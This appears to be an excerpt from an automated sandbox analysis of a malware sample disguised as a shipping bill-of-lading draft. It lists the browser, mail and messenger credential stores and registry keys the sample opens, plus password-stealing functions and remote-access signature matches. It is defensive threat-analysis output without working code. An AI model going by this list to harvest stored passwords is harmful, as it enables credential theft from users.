Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: ESMTPPassword 37_2_004033F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 37_2_00402DB3
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 37_2_00402DB3
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7492, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR